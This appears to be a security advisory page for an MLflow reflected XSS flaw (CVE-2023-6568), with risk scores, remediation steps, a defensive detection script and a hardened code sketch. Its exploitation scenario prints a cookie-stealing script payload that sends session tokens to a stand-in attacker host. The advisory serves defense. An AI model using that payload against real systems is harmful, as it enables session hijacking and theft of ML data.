CVE-2023-6568: MLflow: reflected XSS via Content-Type header injection

Severity: MEDIUM | PoC available | Nuclei template available
Published December 7, 2023
CISO Take

Patch MLflow immediately if your MLOps team runs it with authentication enabled — an unauthenticated attacker can steal session tokens from data scientists and ML engineers by sending a single crafted link. Successful exploitation grants access to training pipelines, model artifacts, and experiment data, with potential pivot to connected cloud infrastructure. Network-restrict MLflow to internal networks or VPN if patching is delayed.

Risk Assessment

CVSS 6.1 understates operational risk in ML environments. The attack requires no authentication and has low complexity — only victim interaction separates an attacker from ML platform access. The Changed scope in the CVSS vector signals cross-boundary impact. Risk is significantly elevated where MLflow is internet-exposed, where ML engineers hold broad data or cloud IAM permissions, or where MLflow credentials are shared/reused across systems.

Affected Systems

Package Ecosystem Vulnerable Range Patched
mlflow pip No patch

Severity & Risk

CVSS 3.1: 6.1 / 10
EPSS: 33.4% chance of exploitation in 30 days (higher than 97% of all CVEs)
Exploitation Status: Exploit Available
Exploitation: MEDIUM
Sophistication: Trivial
Exploitation Confidence: medium
Public PoC indexed (trickest/cve)
Nuclei detection template available
EPSS exploit prediction: 33%
Composite signal derived from CISA KEV, CISA SSVC, EPSS, trickest/cve, and Nuclei templates.

Attack Surface

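AV (Attack Vector): Network
AC (Attack Complexity): Low
PR (Privileges Required): None
UI (User Interaction): Required
S (Scope): Changed
C (Confidentiality): Low
I (Integrity): Low
A (Availability): None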

Recommended Action

  1. Patch: Upgrade to an MLflow version that includes commit 28ff3f94 or later; verify via `pip show mlflow` and compare against the GitHub advisory.

  2. Network isolation: Restrict MLflow UI and API to internal networks or VPN; remove any public internet exposure immediately.

  3. Detection: Alert on requests to the MLflow auth endpoint with non-standard or anomalously long Content-Type headers.

  4. Credential rotation: Rotate all MLflow service account tokens and user credentials post-patch.

  5. CSP enforcement: Validate that Content-Security-Policy headers are configured on MLflow to reduce XSS impact depth.
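
One way to implement the detection in step 3, as an added example that is not part of the original advisory or of MLflow. The JSON access-log format, its field names, the placeholder path and the 128-character threshold are assumptions for illustration, and the log lines are constructed.

```python
import json
import re

MAX_LEN = 128  # assumed length threshold; tune against your own traffic
TOKEN = r"[A-Za-z0-9!#$%&'*+.^_`|~-]+"  # HTTP token characters
# type/subtype plus optional ;name=value parameters (token or quoted string)
CONTENT_TYPE_RE = re.compile(
    rf'{TOKEN}/{TOKEN}(\s*;\s*{TOKEN}=({TOKEN}|"[^"\\<>]*"))*\s*'
)

def content_type_findings(value):
    """Return the reasons a Content-Type value looks anomalous ([] means none)."""
    findings = []
    if len(value) > MAX_LEN:
        findings.append("too_long")
    if "<" in value or ">" in value:
        findings.append("markup_chars")
    if any(ord(ch) < 0x20 and ch != "\t" for ch in value):
        findings.append("control_chars")
    if not CONTENT_TYPE_RE.fullmatch(value):
        findings.append("not_media_type_syntax")
    return findings

def scan(log_lines):
    """Return one alert dict per POST whose Content-Type has findings."""
    alerts = []
    for line in log_lines:
        event = json.loads(line)
        value = event.get("content_type")
        if event.get("method") != "POST" or not value:
            continue
        findings = content_type_findings(value)
        if findings:
            alerts.append({"src": event["src"], "path": event["path"],
                           "findings": findings})
    return alerts

# Constructed log lines in a hypothetical JSON access-log format.
PATH = "/PLACEHOLDER-auth-endpoint"
SAMPLE_LOG = [json.dumps(e) for e in (
    {"src": "10.0.0.5", "method": "POST", "path": PATH,
     "content_type": "application/json; charset=utf-8"},
    {"src": "10.0.0.9", "method": "POST", "path": PATH,
     "content_type": "text/html;<script>/* constructed marker */</script>"},
    {"src": "10.0.0.7", "method": "POST", "path": PATH,
     "content_type": "application/json" + "A" * 300},
    {"src": "10.0.0.5", "method": "GET", "path": PATH, "content_type": "<b>"},
)]
```

`scan(SAMPLE_LOG)` flags the second and third entries only; the well-formed JSON request and the GET are ignored.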

Classification

Compliance Impact

This CVE is relevant to:

EU AI Act: Art. 15 - Accuracy, robustness and cybersecurity
ISO 42001: A.8.4 - Security of AI system development environment
NIST AI RMF: MANAGE 2.4 - Residual risks to AI system operation are mapped and managed
OWASP LLM Top 10: LLM05 - Supply Chain Vulnerabilities

Frequently Asked Questions

Is CVE-2023-6568 actively exploited?

Proof-of-concept exploit code is publicly available for CVE-2023-6568, increasing the risk of exploitation.

What systems are affected by CVE-2023-6568?

This vulnerability affects the following AI/ML architecture patterns: MLOps platforms, model serving, training pipelines, experiment tracking.

What is the CVSS score for CVE-2023-6568?

CVE-2023-6568 has a CVSS v3.1 base score of 6.1 (MEDIUM). The EPSS exploitation probability is 33.35%.

Technical Details

NVD Description

A reflected Cross-Site Scripting (XSS) vulnerability exists in the mlflow/mlflow repository, specifically within the handling of the Content-Type header in POST requests. An attacker can inject malicious JavaScript code into the Content-Type header, which is then improperly reflected back to the user without adequate sanitization or escaping, leading to arbitrary JavaScript execution in the context of the victim's browser. The vulnerability is present in the mlflow/server/auth/__init__.py file, where the user-supplied Content-Type header is directly injected into a Python formatted string and returned to the user, facilitating the XSS attack.
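
The pattern the description names, shown beside a hardened form. This is an added example, not code from MLflow or from the fix commit: the function names, the allow-list and the response shape are assumptions for illustration, and the input is constructed with an inert script body.

```python
import html
import re

# Hypothetical allow-list for this sketch; not taken from MLflow.
ALLOWED_TYPES = {"application/json", "application/x-www-form-urlencoded"}
TOKEN = r"[A-Za-z0-9!#$%&'*+.^_`|~-]+"  # HTTP token characters
MEDIA_TYPE_RE = re.compile(rf"{TOKEN}/{TOKEN}")


def media_type(content_type):
    """Return lower-cased type/subtype without parameters, or None if malformed."""
    base = (content_type or "").split(";", 1)[0].strip().lower()
    return base if MEDIA_TYPE_RE.fullmatch(base) else None


def reject_unsafe(content_type):
    """Flawed pattern: the raw header value is formatted into an HTML response."""
    body = f"Invalid content type: '{content_type}'"
    return 400, {"Content-Type": "text/html; charset=utf-8"}, body


def reject_hardened(content_type):
    """Echo at most 100 escaped characters, as plain text, with sniffing disabled."""
    shown = html.escape((content_type or "")[:100], quote=True)
    headers = {
        "Content-Type": "text/plain; charset=utf-8",
        "X-Content-Type-Options": "nosniff",
    }
    return 400, headers, f"Invalid content type: '{shown}'"


def handle(content_type, reject=reject_hardened):
    """Accept allow-listed media types; otherwise build the error response."""
    if media_type(content_type) in ALLOWED_TYPES:
        return 200, {"Content-Type": "application/json"}, "{}"
    return reject(content_type)


# Constructed input: markup placed after a media type, with an inert script body.
SAMPLE = "text/html;<script>/* constructed marker */</script>"

if __name__ == "__main__":
    for reject in (reject_unsafe, reject_hardened):
        status, headers, body = handle(SAMPLE, reject)
        print(reject.__name__, status, headers["Content-Type"], body)
```

Escaping and the `text/plain` response type are independent controls; either one alone stops the echoed value from being parsed as markup, and applying both covers the case where one is later removed.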

Exploitation Scenario

An attacker targeting an ML team discovers their MLflow instance via Shodan or internal recon. They craft a POST request URL to the MLflow auth endpoint embedding JavaScript in the Content-Type header — e.g., `text/html;<script>fetch('https://attacker.com/?c='+encodeURIComponent(document.cookie))</script>`. The attacker sends a phishing email to a data scientist with a link triggering this request. When the victim clicks, MLflow reflects the malicious Content-Type back unescaped, the script executes in the victim's browser, and their session token is silently exfiltrated. The attacker uses the stolen token to download production model artifacts, inspect training data references, or pivot to connected cloud storage buckets using credentials stored in MLflow's artifact backend configuration.

Weaknesses (CWE)

CVSS Vector

CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N

Timeline

Published: December 7, 2023
Last Modified: November 21, 2024
First Seen: December 7, 2023

Scanner Template Available

A Nuclei vulnerability scanner template exists for this CVE. You can scan your infrastructure for this vulnerability immediately.

nuclei -t http/cves/2023/CVE-2023-6568.yaml -u https://target.example.com
